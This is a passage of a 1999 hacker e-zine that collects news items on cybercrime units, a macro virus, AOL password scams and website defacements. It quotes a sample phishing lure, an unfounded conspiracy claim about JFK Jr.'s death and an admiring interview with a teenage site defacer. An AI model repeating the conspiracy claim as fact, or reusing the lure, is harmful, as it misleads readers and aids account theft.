obligations are followed. The Counsel's report is silent on covert
cyber-warfare that might be "contemplated" by other agencies.

William M. Arkin can be reached for comment at
william_arkin@washingtonpost.com

© Copyright 1999 Washington Post.Newsweek Interactive

@HWA

20.0 England To Launch High Tech Crime Unit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne
Expected to be formed in London next year is an
anti-computer crime team that will be composed of
specialist police officers, security people from both the
MI6 and MI5, and experts from academy and industry.
This team will be called the "High Tech Crime Unit", the
team will have units to cover various computer crimes
that span from computer intrusion, pornography,
counterfeiting, and fraud.

The London Independent
http://199.97.97.16/contWriter/cnd7/1999/10/25/cndin/8263-1466-pat_nytimes.html


British Police Launch a Cyber Squad to Combat Internet Crime

JASON BENNETTO
c.1999 The Independent, London

LONDON -- A national police squad is to be set up to tackle the growing
menace of computer and Internet crime.

A confidential police assessment shows that ``cyber-crime'' in Britain is
growing -- it includes such activities as money laundering, pornography,
counterfeiting, hacking, and fraud.

The new computer crime team is expected to include experts from
universities and the electronics industry, intelligence from the security services
MI6 and MI5, as well as specialist police officers.

The squad is expected to be based at the National Criminal Intelligence
Service (NCIS) in London. Ministers have given their backing to the idea
and the police intend to ask Home Office officials next month for extra
funding for the project.

The police have already taken advice from code-breaking experts at the
National Security Agency, the American intelligence organization, and plan to
exchange information with the FBI.

The squad is expected to be called the ``High Tech Crime Unit'' and will
have ``cells'' or specialist sectors to deal with different types of cyber-crime.
They will cover a range of areas, which have been identified in a report by
the Association of Chief Police Officers (ACPO), that include fraud,
pornography, pedophile activity, spreading race hate, counterfeiting,
gambling, hacking and stealing information, software piracy, money
laundering, and sabotage involving computer viruses.

The unit follows growing unease among chief constables and John
Abbott, the director general of NCIS, about the growth in crime committed
using computer systems and the Internet. Millions of pounds are lost every
year as criminals switch from traditional methods of law-breaking to cyber
offences where there are fewer risks of being caught.

David Phillips, the chief constable of Kent and head of the ACPO's
crime committee, said: ``Traditional crimes - deception, fraud, pornography,
swindles of all kind - are taking place via the Internet. We have to go on the
offensive as hunters in this sea of information.

``You have to go into deep battle and attack criminals whenever they
surface.'' He argued that the lack of a specialist team meant that ``at present
we are almost blind.'' He said: ``We recently had discussions with [computer
experts from] the USA who told us they were dealing with millions of pounds
of criminal transactions. They are just mind-boggling levels of crime.'' He
added that the squad, which is likely to be set up next year, would link up
with forces throughout the country.

-----

(Distributed by New York Times Special Features)

@HWA

21.0 First Project Macro Virus Discovered
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirB
Corner is suspected to be the first virus to infect MS
Project files. This macro virus can travel between MS
Word and MS Project. It does not have a malicious
payload and does nothing but replicate. Corner even has
a nice little poem at the end of its code. The poem is
from Joy Division's song "Twenty-four hours", taken from
their 1980 album titled "Closer".

Data Fellows
http://www.data-fellows.com/v-descs/corner.htm

F-Secure Virus Information Pages


NAME:
Corner
ALIAS:
Project virus, P98M


Corner is the first macro virus to infect Microsoft Project application. This virus infects
both Project and Word and can travel between them.

When an infected document is opened to Microsoft Word 97 or 2000, P98M/Corner.A
checks if Microsoft Project is running. If it is, it gets infected.

The Word part of the virus is a simple class infector. It spreads when an infected
document is closed. At this time it sets the Office 2000 security settings to low,
disables the "Tools/Macros" menu and turns off the macro virus protection. After that the
virus replicates to all opened documents.

Corner is not able to infect Microsoft Word 2000, unless the user has first changed the
security settings to medium or low.

To infect Project, the virus adds a new blank project and inserts the virus code to the
"ThisProject" class module.

When an infected document is opened to Microsoft Project 98, Corner.A infects Word
application, even if it is not running.

The MS Project part of the virus is not resident, and it does not infect the global project.
The virus replicates during the project deactivation (after an infected project has been
opened).

The virus infects Word application by opening it and inserting the virus code in the global
template's class module "ThisDocument". This process is hidden from the user and the
user can't see the infection of Word.

Corner.A virus contains the following comments at the end of its code:



'I never realized the lengths I'd have to go
'All the darkest corners of a sense
'I didn't know
'Just for one moment
'hearing someone call
'Looked beyond the day in hand
'There's nothing there at all
'Project98/Word97-2k Closer

The text is from Joy Division's song "Twenty-four hours", taken from their 1980 album
titled "Closer".

Corner does not do anything but replicate.

[Analysis: Katrin Tocheva and Sami Rautiainen, Data Fellows]

@HWA


22.0 Microsoft Web Page Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
The web site for Microsoft's Conference Management
Server was defaced late Sunday evening and was still
not fixed over 24 hours later. The defacement consisted
of two seperate index files and was not one of the main
pages. This defacement joins several military severs
that have recently been defaced including US Army
Reserve Command, White Sands Missile Range, Navy
Management System Support Office, Department of
Veterans Affairs and others.

Attrition Mirror
http://www.attrition.org/mirror/attrition/

@HWA

23.0 Rubi-Con Wants You!
~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by locutus
Rubi-Con organizers have issued an official call for
speakers. Rubi-Con 2000 is scheduled for April 28-30,
2000 in Detroit Michigan. Speakers even get free
goodies like extra free passes for your friends and a free
t-shirt. WooHoo!

Rubi-Con
http://www.rubi-con.org

@HWA

24.0 Clinton Signs Phone-Tracking Bill Under 911 Cover
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion
A provision of a bill that makes 911 the official
emergency number across the country has been signed
into law. One provision of this law directs the Federal
Communications Commission to help states develop
systems that can automatically locate cellular callers
who have dialed 911. The new system will probably take
advantage of GPS to locate callers. The law also calls
for "automatic notification when a vehicle is involved in
an accident."
(The potential abuses of these new
systems is frightening.)

Associated Press
http://library.northernlight.com/EC19991026990000010.html?cb=200&dx=2006&sc=1#doc

Story Filed: Tuesday, October 26, 1999 5:04 PM EDT

WASHINGTON (AP) -- President Clinton signed legislation Tuesday making 911
the official emergency number nationwide -- for both regular and cellular
phones.

The measure also calls for development of technology that can track mobile
callers.

People with wireless phones now will be able to speed responses to highway
accidents, crimes and natural disasters,'' Clinton said. ``Getting rapid
care to someone who is suffering from a heart attack or is involved in a
car crash can mean the difference between life and death.''

While 911 is widely used as the emergency number for traditional phones,
there are 20 different codes for wireless callers across the country. The
changes are aimed at cutting response times for the crews who answer
98,000 emergency calls daily from cellular phone callers.

``In my home state,'' said Sen. Conrad Burns, R-Mont., ``three quarters of
the deaths in rural areas are because the first responders couldn't get
there in time.''

Health care professionals joined Burns at a Capitol Hill news conference
to applaud the new law.

``We have great emergency room personnel. We can do a lot for accident
victims if we can find them and get them there,'' said Barbara Foley of
the Emergency Nurses Association. ``That's what this legislation helps us
do.''

Another provision of the act directed the Federal Communications
Commission to help states develop emergency systems, including technology
that can automatically locate cellular callers who have dialed 911 or been
involved in an accident.

The FCC in September moved forward with plans to require that cellular 911
calls automatically provide a caller's location. Regulators want
manufacturers to begin providing locator technology within two years.

Privacy advocates have raised concerns about potential abuse of the
technology, which would take advantage of the Global Positioning System
developed by the military.

The law signed Tuesday called on regulators to establish ``appropriate
privacy protection for call location information,'' including systems that
provide automatic notification when a vehicle is involved in an accident.

It said that calls could only be tracked in nonemergency situations if the
subscriber had provided written approval. ``The customer must grant such
authority expressly in advance of such use, disclosure or access,''
according to Senate documents detailing provisions of the
legislation.

An estimated 700 small and rural counties have no coordinated emergency
service to call -- even with traditional phones. The bill would encourage
private 911 providers to move into those areas by granting the same
liability protections to wireless operations that now are offered to
wireline emergency service systems.

Separately, the FCC took action earlier this year to increase the number
of cellular calls to 911 that are successfully completed. The commission
required that new analog cellular phones -- not existing phones -- be made
with software that routes 911 calls to another carrier when a
customer's own service cannot complete the call.

Calls sometimes aren't completed because a caller is in an area where his
or her carrier does not have an antenna, because networks are overloaded
or because buildings or geography block signals.

Digital phones, of which 18.8 million now are in use, were not covered by
the new FCC rules adopted in May because such phones are more complex than
their analog counterparts and there is no easy fix for the problem.

Copyright © 1999 Associated Press Information Services, all rights reserved.

@HWA

25.0 Carry Tax on Dollars Proposed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Br0k3
A new tax proposed by Marvin Goodfriend, a senior vice
president at the Federal Reserve Bank of Richmond
would cost you money the longer you held cash without
depositing it. This Carry Tax would be deducted from
each bill upon deposit according to how long the bill was
in circulation. According to Goodfriend this would have
the effect of discouraging people who 'hoard' currency,
deter black market and criminal activities, and boost
economic stability during deflationary periods. (Before
you know it they will be putting cellular tracking devices
in your money so when it gets stolen it can be
recovered.)

Wired
http://www.wired.com/news/politics/0,1283,32121,00.html

Cash and the 'Carry Tax'
by Declan McCullagh

3:00 a.m. 27.Oct.1999 PDT
WASHINGTON -- US currency should include tracking devices that let the
government tax private possession of dollar bills, a Federal Reserve
official says.

The longer you hold currency without depositing it in a bank account, the
less that cash will be worth, according to a proposal from Marvin
Goodfriend, a senior vice president at the Federal Reserve Bank of
Richmond.

In other words, greenbacks will get automatic expiration dates.

"The magnetic strip could visibly record when a bill was last withdrawn
from the banking system. A carry tax could be deducted from each bill upon
deposit according to how long the bill was in circulation,"
Goodfriend
wrote in a recent presentation to a Federal Reserve System
conference in Woodstock, Vermont.

The 34-page paper argues a carry tax will discourage "hoarding" currency,
deter black market and criminal activities, and boost economic stability
during deflationary periods when interest rates hover near zero.

It says new technology finally makes such a scheme feasible. "Systems
would have to be put in place at banks and automatic teller machines to
read bills, assess the carry tax, and stamp the bills 'current,'"
the
report recommends.

Goodfriend said in an interview that banks might place a kind of visible
"date issued" stamp on each note they distributed. "The thing could
actually stamp the date when the bill comes out of the ATM,"
he said.

Congressional critics say they would oppose any such move.

"The whole idea is preposterous. The notion that we're going to tax
somebody because they decide to be frugal and hold a couple of dollars is
economic planning at its worst,"
said Representative Ron Paul (R-Texas), a
free-market proponent who serves on the House Banking committee.

"This idea that you can correct some of the evil they've already created
with another tax is just ridiculous,"
Paul said. Other economists say a
carry tax is not a wise plan.

"This is going beyond taxing banks for holding reserves. It's taxing the
public for holding currency too long. That's even more wild an idea,"
says
George Selgin, a University of Georgia economics professor who specializes
in monetary policy. "There are sweeping implications of these
suggestions beyond whatever role they might play in thwarting a
deflationary crisis... I think it's a very dangerous solution to what may
be a purely hypothetical problem,"
Selgin said.

Goodfriend discusses an alternative: The Fed should at times prevent
Americans from withdrawing cash from their bank accounts. "Suspending the
payment of currency for deposits would avoid the cost of imposing a carry
tax on currency."


But he concludes that such a move would have "destabilizing" effects, and
recommends that the Federal Reserve instead "put in place systems to raise
the cost of storing money by imposing a carry tax."


The idea has been discussed before. Economist John Keynes mentioned the
possibility, but dismissed it because of the administrative hassles
involved.

Silvio Gesell, a Keynes contemporary and like-minded thinker, also
suggested taxing money to allow lower interest rates.

But Goodfriend says that technology has advanced since then. "In light of
recent advances in payments technology and the less-than-satisfactory
alternatives, imposing a carry tax on money seems an eminently practical
and reasonable way [to proceed],"
he writes.

He said the Federal Reserve has technology that would make it "feasible,"
but refused to give details.

One reason for a carry tax, he says, is the reduced influence of the US
central bank when prices are not increasing and inflation is close to
zero. During such a period, banks are less likely to make loans -- even if
the Fed tries to spur an economic expansion through open market
operations.

But if the government taxes the currency holdings of individuals and banks
through an occasional carry tax, they may be inclined to lend money even
at a negative interest rate in order to avoid holding on to it.

"This proposal is made well in advance of any problem we have in the US.
It's not an emergency proposal at this point,"
he said. The report says
Congress would have to pass legislation allowing such a tax.


@HWA

26.0 $250 Million in Police Tech Approved
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Br0k3
Part of the $39 billion fiscal 2000 appropriations bill that
funds the departments of Commerce, Justice and State
includes $250 million for law enforcement technology.
$130 million of the money will be used for the Crime
Identification Technology Program which will help local
communities participate in national crime databases and
improve crime laboratories. Monies are also earmarked
for upgrades and increased management of various
systems as well as development of multi-jurisdictional,
multi-agency communications systems.

Civic.com
http://www.civic.com/news/1999/oct/civ-law-10-26-99.html

Congress Approves $250 Million
for Law Enforcement Technology

October 26, 1999

The House and Senate last week approved $250 million in funding for law
enforcement technology as part of the $39 billion fiscal 2000 appropriations
bill that funds the departments of Commerce, Justice and State.

The $250 million compromise bill, approved during a House/Senate
conference, comes after the original House version of the bill proposed taking
$60 million from a trust fund to bankroll the high-tech projects and the Senate
version earmarked $350 million for the effort.

According to the conference report, $130 million will be used for the Crime
Identification Technology Program, which was born out of the 1998 Crime
Identification Technology Act. The act established a five-year, $1.25 billion
grant program for state and local governments to help local communities
participate in national crime databases and improve crime laboratories.

Congress also included specific language in the report that outlined various
uses for the money, including upgrades to criminal history and criminal justice
record systems; improved management of criminal justice identification, such
as fingerprint-based systems; integration of national, state and local systems
for criminal justice purposes; and development of multijurisdictional,
multiagency communications systems.

U.S. Sen. Mike DeWine (R-Ohio), a former prosecutor, championed the bill,
which gained House and Senate approval Oct. 22. "It is crucial [that] the
dedicated men and women who are on the front line of crime-fighting efforts
have access to advanced technology,"
DeWine said. "Crimes today are being
committed with the use of technology, so it only makes sense that they be
solved with advanced technology."


The bill also provides funding for two $7.5 million grants that cover individual
state efforts in high-tech law enforcement. Kentucky received a grant for a
statewide law enforcement program, and the Southwest Alabama Department
of Justice will use the money to integrate data from various criminal justice
agencies. States also will receive $30 million in grants to reduce their DNA
backlogs and for the Crime Laboratory Improvement Program.

The bill also includes $15 million for Safe Schools technologies, which are
geared toward providing more effective safety techniques in the nation's
schools, and $35 million for the Brady Act to upgrade criminal history
records.

-- Dan Caterinicchia (danc@civic.com)

@HWA

27.0 Interview With Web Inventor
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Deepquest
Forbes magazine has an interesting interview with
Robert Cailliau, the co-inventor of the World Wide Web.
In the article Cailliau proposes some radical ideas,
everything from a pay per page model of the internet to
licensing all internet users.

Forbes
http://www.forbes.com/Forbes/99/1101/6411112a.htm

Regulate the Internet? The very idea sends
shivers down a lot of spines. But one of the
Web's inventors argues that only regulation
can save it from its own excesses.

Bring in the Cyberpolice

By Christopher Watts

CYBERSPACE IS GETTING SCARY. Those
sleazy porn sites. Viruses. Gaudy ads.
Unstoppable spam e-mail. You click "okay"
on an e-commerce item and hope that your
money doesn't vanish into some Internet
bandit's account in Lagos. If things get
much worse, logging on to the Net may be
as perilous as straying into a bad part of
town after dark.

An exaggeration? Robert Cailliau, the
co-inventor of the World Wide Web, doesn't
think so.

"There was a time when the community that
was on the Net was homogenous and
civilized,"
sighs Cailliau. "Now it's not. We're
in the middle of chaos. It may calm down.
But the alternative is that there's a total
meltdown of the system and that it
becomes unusable. That would be a
catastrophe. We must regulate [the Web] if
we want to have some civilization left. And
it's getting urgent."


As staffers in the early 1990s at Geneva's
European Laboratory for Particle Physics (a
20-country research collaboration known by
its French acronym, CERN), Cailliau and a
now high-profile British colleague, Tim
Berners-Lee, developed the address formats
and other standards to create the World
Wide Web. Berners-Lee is now at the
Massachusetts Institute of Technology and
has just published a book titled Weaving the
Web: The Original Design and Ultimate
Destiny of the World Wide Web by its
Inventor (HarperCollins, San Francisco).

Today the lower-profile Cailliau, a
52-year-old Belgian native, heads Web
communications at CERN and spends much
of his time with the International World Wide
Web Consortium, a standards-setting body.

How would Cailliau make the Web more civil
and less chaotic? His controversial idea is
that we should find some means other than
banner ads to finance it. "The forced
influence of advertising has given us
completely useless TV,"
he notes. "You don't
want that on the Net. But most on-line
information providers need to attract
advertising--which slows downloads and
clutters the screen with windows."


The bandwidth explosion will solve the speed
problem, but it won't address the clutter
problem. To reduce the Web's dependence
on advertising, Cailliau proposes a so-called
micropayment system, wherein Web surfers
would pay a few cents every time they
download a page from the Web. "It would
change the landscape completely if
[Web-site owners] could live by providing a
high-quality, responsive service,"
says
Cailliau.



License all Internet users the
way automobile drivers must
be licensed....



How would the micropayments idea work?
Cailliau replies:

"An article from a newspaper would [cost
users] something on the order of a cent or
less, but a really hot item could be several
cents, depending on what the author thinks
he or she can get away with. If you find it
too expensive, you go somewhere else. The
site that's too expensive loses clients."


Cailliau points to France's Minitel system,
which operates over France Telecom's
wires. From public or private terminals,
Minitel users pay modest amounts for
access to information on everything from
movie schedules to restaurant reviews--with
not an ad in sight. "You know what you're
going to pay, and you know what you're
going to get,"
says Cailliau.

But doesn't Minitel charge users according
to time spent on-line, rather than per-page
fees? "That's the wrong model," Cailliau
concedes. "But even that bad model has
been shown to be commercially
successful--even today, parallel to the
Web. I always believed that if we did not
have the telecom monopolies in Europe at
the time of Minitel's introduction--if anyone
in all of Europe could have subscribed to
it--it would have spread like wildfire. 'Minitel
Version Two' would have been what the
Web is now."


Cailliau's other proposal to save the Web
from its own success: License all Internet
users, the way automobile drivers must be
licensed to use public streets. In defense of
this controversial idea, Cailliau says: "To get
a license, people would have to learn basic
behavior: choosing an Internet service
provider; connecting to the Web; writing
e-mails; problem diagnosis; censoring your
own computer; and setting up a site. More
important than that: knowing what dangers
to expect and knowing how the Internet can
influence others."


But wouldn't licensing, by making Internet
users more traceable and accountable, run
counter to the free spirit of the Web--which
helped it develop so rapidly? And wouldn't
licensing also crimp the Internet's power to
fight Big Government's power?

Perhaps. But Cailliau does insist on pointing
out this: "If you operate a TV or radio
station, you have to have a license. It has
nothing to do with fundamental freedom. It
has to do with protection of the average
citizen against abuses."


Cailliau continues: "Everybody thinks that
licenses are perfectly all right on the roads,
because of the danger to life and limb. But
one can equally cause a lot of harm by
spreading false and dangerous information.
Sooner or later someone is going to be able
to trace the death of a person to an
Internet act. Then [the licensing question]
will probably be taken seriously."


@HWA

28.0 Computer Attacks Up Sharply in Hong Kong
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by evilwench
In the first eight months of 1999 there have been 138
reported cyber attacks compared with only 18 for all of
last year, reported Senior Inspector Paul Jackson of the
Police Computer Security Unit in Hong Kong.

South China Morning Post
http://www.technologypost.com/personal/DAILY/19991027102522210.asp?Section=Main


Published on Wednesday, October 27, 1999

PERSONAL COMPUTING

Hackers step up attacks on SAR

ERIC NG

The number of computer-hacking cases reported to
police in the first eight months of this year was 138
compared with 13 for the whole of last year.

Senior Inspector Paul Jackson of the Police Computer
Security Unit disclosed the figures yesterday during a
seminar on Internet-related data protection organised by
the Federation of Hong Kong Industries.

While the figures might suggest more organisations were
willing to report hacking crime than previously,
Inspector Jackson said "far too many organisations do
not report hacking cases for fear of bad publicity"
.

He did not give figures on damage suffered by victims,
saying it was difficult in many cases to qualify the
monetary losses.

The number of cases involving the private sector was
not revealed.

Inspector Jackson cited one case under investigation in
which the network of a large SAR organisation had
suffered multiple hacking attacks for three months early
this year before they were discovered.

"The source of the attacks was from overseas, but we
don't know all the things the hacker might have done
and therefore cannot be sure of the extent of damage,"

he said.

Meanwhile, an Internet auction case, still under
investigation, involved Hong Kong fraudsters and
multiple victims worldwide.

The number of Internet shopping fraud cases reported in
the first eight months was 13, compared with one for the
whole of last year.

Inspector Jackson said the application of laws on
e-commerce fraud cases had been difficult as new types
of frauds appeared all the time.

"We are on a big learning curve [on e-commerce
cases],"
he said.

Inspector Jackson said his unit had maintained a close
liaison with SAR Internet service providers and was
trying to set up an informal group for them to share their
experiences on computer crime and solutions.

Another speaker at yesterday's seminar, Director of
Information Technology Services Lau Kam-hung, said
the Government would set up its Secure Central Internet
Gateway early next year, adopting internationally
accepted security standards.

"It will protect the government bureaus and departments
by means of fire-walls, virus-detection systems and
pro-active intrusion-detection systems,"
he said.

Wired;

Crackers Penetrate MS Site
Wired News Report

4:00 p.m. 26.Oct.1999 PDT Microsoft Web site cracked! For first time
ever, a Microsoft site defaced!

Says so right there in Tuesday's tech media headlines.

Well, sort of. Not really, said Microsoft.

"No part of the Web presence of Microsoft was compromised," said spokesman
Adam Sohn. "There's no new vulnerability here."

Then how to explain the message, "flipz was here and f0bic, your seksi
voice helped me through the night heh. Save the world. Kill Bill,"
that
appeared on a Microsoft's "Conference Management Server" Web site?

The answer, according to Microsoft, is that the site was indeed cracked.
But it belonged to a lone Microsoft engineer's "test box," a standalone
Web server the engineer used to test code. The server was not connected to
either Microsoft.com or MSN.com or the Microsoft Intranet.

There are many such standalone servers, said Sohn, all of them outside the
corporate Web ring.

"Obviously, this one was not properly patched," said Sohn. "The guy who
put up the site, while he obviously knows a lot about information
technology, probably wasn't paying too much attention"
to security.
Nothing was compromised, said Sohn.

So, properly speaking, fortress Microsoft.com remains unbreached -- at
least by Web site spoofers. It's not for lack of trying, said a
weary-sounding Sohn.

"People are banging on us constantly, all day, everyday from everywhere
around the world."



@HWA

29.0 AOL Password Scams Abound
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
Remember the grandmother from Kansas City, North
whose AOL account was used to send thousands of
porn SPAMs? Well AOL password thieves have not
stopped their shenanigans, everything from free offers
to web page redirects to trojan horses, the methods are
wide and varied but still abound.

Kansas City Star
http://www.kcstar.com/item/pages/business.pat,business/3773f414.a25,.html

DAVID HAYES: BITS & BYTES
Many Internet scams result in password theft

By DAVID HAYES - Columnist
Date: 10/25/99 22:15

Betty Anne Brown wants to make one thing perfectly clear: She is
not the infamous Porno Grandma. But for a brief time last month,
hackers made it look as if she was playing one on America Online.

About 3,500 AOL subscribers across the country received e-mail
from Brown's AOL account in September suggesting they go to a
Web site offering "XXX Porn, For Free, For Real."

The Kansas City, North, mother and grandmother became one of
thousands of AOL users who have been victimized by password
thieves -- low-tech computer hackers who steal passwords to
break into AOL accounts.

"I'm a very straight lady," the 66-year-old grandmother said. "It was
a little embarrassing."


Brown thinks the password theft happened while she and her
husband, Linn Brown, were traveling in Italy in September. The
couple stopped at a storefront shop in Rome that offered Internet
access for $5 an hour.

"It seemed like such a great opportunity when we were traveling,"
Brown said. "Postcards take so long to get back."

However, Brown thinks that while she was writing to friends and
relatives to tell them about the trip, a hacker nabbed her login and
password.

Stealing passwords, sometimes called "password fishing," is nothing
new for AOL or other online services. However, as the number of
AOL customers grows -- AOL announced Monday that the service
now had more than 19 million subscribers -- the number of potential
targets is growing also.

Some hackers use the passwords to break into accounts as they
attempt to steal credit card numbers. Some use AOL e-mail to send
out spam promoting adult Web sites or to try to steal additional
passwords. And some just do it for kicks.

In the case of Brown, the thief sent out a porn notice. But a check
found that the site, which had been set up on the free Angelfire
community Web site, was apparently set up to steal credit card
information. It was an adult Web site that requested credit card
information -- but didn't really exist beyond the sign-up screen.

The site has since been closed by Lycos Inc., which owns and
operates the Angelfire site.

Brown said she discovered the scam when she started receiving
irate e-mail from people who had received the notices from her
account. She looked in her "sent mail" folder and found hundreds of
sent e-mail notices, all alphabetized.

She wrote those who complained to apologize. "I don't know if they
read it or not, but I thought it was the right thing to do,"
she said.

The Browns changed their passwords and assumed the problem
was over.

But just last week, AOL finally caught on to the problem and
suspended the Browns' accounts. The couple found out about the
suspension when they discovered that their passwords didn't work.
They called AOL and explained the situation, and AOL restored
their service.

Security always has been a big problem for AOL.

"It's been said, accurately, that AOL is a marketing company, not a
technology company,"
said David Cassel, editor of AOL Watch, an
e-mail newsletter with 50,000 subscribers.

In the "neighborhood watch" area of AOL, the online service lists
dozens of scams used to steal passwords. Many read like this one:

"Dear America Online Member,

"
Your account was given 6000 Minutes of America Online
credits. This means you get AOL for free for 6000 minutes! Just
Click Here to confirm the credit. Thank you America Online
user."

Most likely, that link took the user to a site set up specifically to
steal a user's password.

That's the fastest growing scam on AOL.

An e-mail provides a Web site link and asks the person who
receives it to click on the link. Some of those links lead to Web sites
that quietly download a "
Trojan horse" program that goes into a
user's computer and looks to see if that person stored their AOL
password on the hard drive.

Others lead to bogus Web sites that look like AOL and ask the user
to log in.

Some are bogus adult sites that ask for credit card information.

The AOL neighborhood watch area was set up in response to a
growing number of attempts to steal user passwords and credit card
information.

"
Never click on a link in an e-mail," said Rich D'Amato, an AOL
spokesman. "
AOL will never ask for your password or user name.
Anyone pretending to ask for that information is not from AOL."

D'Amato suggested that surfers using the Microsoft Internet
Explorer Web browser set the security setting on their software to
"
medium" or higher. The security setting, on the browser's toolbar
under "
tools" and then "Internet options," alerts users to any
download that could be dangerous.

AOL also provides a free trial version of a virus software that users
can download. The software, which expires after 30 days, can be
downloaded each month for free, D'Amato said.

In Brown's case, it's possible her password was stolen by a hacker
who installed a program on the computer in Rome that records each
keystroke made by a user. The information can be retrieved
remotely.

D'Amato said users who travel should carry a copy of their virus
software and its updates, and install the software on any computer
they use to check for such programs.

Cassel, however, thinks AOL creates some of its own problems by
being too secretive about the extent of the company's security
problems.

"
AOL is very publicity sensitive," Cassel said. "It creates the ideal
atmosphere for hackers to operate in."

The experience hasn't dampened the Browns' enthusiasm for the
Internet or AOL.

The couple uses AOL to keep in contact with grandchildren,
children and relatives, and for general research.

"
I wanted people to know what can happen," Brown said. "It would
have been so easy just to change my password and avoid all this."

To reach David Hayes, technology reporter, call (816) 234-4904 or
send e-mail to dhayes@kcstar.com

@HWA

30.0 United Loan Gunmen Return
~~~~~~~~~~~~~~~~~~~~~~~~~

Note: the ULG is erroneously referred to as the "
United Lone Gunmen"
the correct name is United Loan Gunmen, substitute where necessary - Ed

From HNN http://www.hackernews.com/

contributed by Code Kid
More new interesting defacements have joined the one
done of the Microsoft site last Sunday. The Web Site of
George Magazine has been defaced by the United Lone
Gunmen, additional defacements included U.S. Navy
Coastal Systems Center, Andersen AFB, and a slew of
others.

Statement by ULG - via OSALL
http://www.aviary-mag.com/News/ULG_Speaks/ulg_speaks.html

Interview with Flipz - via OSALL
http://www.aviary-mag.com/Interviews/Flipz/flipz.html


Yesterday morning HNN mentioned that a Microsoft web
page had been defaced two days prior. Not really big
news, web page defacements happen on a daily basis,
but the mainstream media picked it up and thought it
was important enough to run a two day old story. Here
are some of the links.

MSNBC
http://www.msnbc.com/news/327726.asp?cp1=1

UOL - Brazil
http://www2.uol.com.br/info/infonews/101999/26101999-19.shl

ABC
http://abcnews.go.com/sections/tech/DailyNews/mshack991026

Wired
http://www.wired.com/news/technology/0,1282,32142,00.html

Ultimahora - Portugal
http://ultimahora.publico.pt/barra-central.asp?id=5883

Statement by ULG

ULG Speaks
10/27/99 ULG

[Editor´s Note: The following is an exclusive statement given to OSAll
by members of United Lone Gunmen. This statement is in regard to the
recent defacement of George Magazine by ULG. A mirror is available
at Attrition.]

The reason behind the georgemag.com hack was more of a pro-hack than a
hack bashing the administrator/organisation/etc. We of ULG believe JFK Jr.
was murdered in his plane by a bomb implanted before take off. Shortly after
he radioed into the tower saying everything was fine, the tail was blown off,
causing his demise, as well as his passengers. ULG believe the bomb was
planted by CIA in accordance with the Bush Administration in an effort to
'shut him up'. JFK Jr. supposedly wanted to run for president, and knowing
he would have a supreme chance at winning, the Bush Administration could
not allow this. Being that there is a ungodly amount of money put into Bush's
campaign, they were forced to kill him. This is only conspiracy theory, and
may not lead no where, but should Bush win... it will bring more thought to
this theory.


Interview with flipz;


Interview With Flipz
10/27/99

Mike Hudack
Editor-in-Chief

Flipz is a young man who both goes to school and moonlights as a systems
analyst somewhere. He´s got a bright future for someone only fifteen years
old [Editor´s NOTE: As the writer of this article, I must admit that I
am but sixteen years old.]... And, at that young age, he has been covered
in MSNBC, Ziff Davis, Slashdot and so many more. At that young age
he´s made history as the first person to deface a Microsoft Web page --
ever.

"
I do it for fun, just like everyone does it for fun," Flipz said in an effect to
explain why he defaces sites, "
we don´t do it because we have to, we don´t
do it because we want to, we don´t d

  
o it because it´s fun." He says that his
first defacement was when he was around ten or eleven -- that time a
Solaris machine.

He cnows that he hacs but doesn´t now that he´s defaced servers?

Andersen Air Force Base

"Hold on five seconds, I´ll tell you," he told me when I asked if anything else
was happening soon. After a couple affirmatives and a few obscenities he
informed me that he´d just gotten his latest defacement. "Andersen.af.mil,"
he calmly told me.

It was just the latest in a string of sites he had previously held root on.
Apparently something has happened in Flipz´ life to make him want to just
throw it all out. "It´s been tough," he said. "I just wanted to have some
fun," let out some pent-up aggression.

Microsoft

Now it seems that he targets Microsoft NT boxes exclusively, explaining
that he hates Windows NT -- and that Windows 2000 pisses him off even
more.

The thing that Flipz is most famous for right now is defacing the first
Microsoft site ever. He was on the phone with someone when he defaced
it... When he heard it was the first he was excited, but not suprised. "I kind
of knew it, but I didn´t know it," he says about the defacement.

High Profile

Like the Microsoft defacement, all of Flipz´ attacks have been attention
garnering, although none so much as that. He´s attacked numerous military
sites, including from the Navy and Army. In addition he´s defaced two
Department of Energy Web sites and the Duracell Battery Company,
among others.

Law Enforcement

It was a couple months ago when Flipz defaced People´s Bank, a relatively
small Connecticut bank. Somewhat aftewards Attrition.org was
subpeonaed for any records they may have pertaining to Flipz and the
defacement. When I told him about the subpeona Flipz was rather shocked
that the FBI hadn´t raided him yet. "It´s been a while... you´d think they
would have at least stopped me after White Sands [Missile Base.]"

The FBI didn´t though. At one point during our conversation Flipz thought
he was being raided as a black van rounded the corner to his house. It
turned out to be nothing, however. "I´m just sitting on edge, waiting for
them to raid me," he said.

He explained that he hadn´t done much to cover his tracks because they´d
find him anyway. "Why bother with twenty hops when they´ll just issue
twenty subpeonas?" And, he added, "even if I cover my tracks well... all
they need is one person on IRC to say `oh, I know who this person is.´"

The FBI, at this point, doesn´t seem to know Flipz´ identity. They asked
me several times in a later interview, and each time came up empty because
I didn´t know myself. More is available on the FBI.

Skills

Some people on IRC have questioned Flipz´ skills. Flipz says that he
"works with NT on a daily basis [as a] systems analyst" but others aren´t
too sure.

"He´s demonstrated no real NT skills," said one IRCer who knew flipz but
wished to remain anonymous. This IRCer said that all the defacements
were on NT systems running IIS, insinuating that Flipz was simply using the
eEye exploit released earlier this year.

But Flipz mantains that "I´m not using IIS, I´m not using FrontPage, I´m not
using FTP exploits..." Rather, he says he´s using "some exploits modified
for my own use and a private one or two." More detail on his
methodology, or speculation thereof, is available.

More to Come

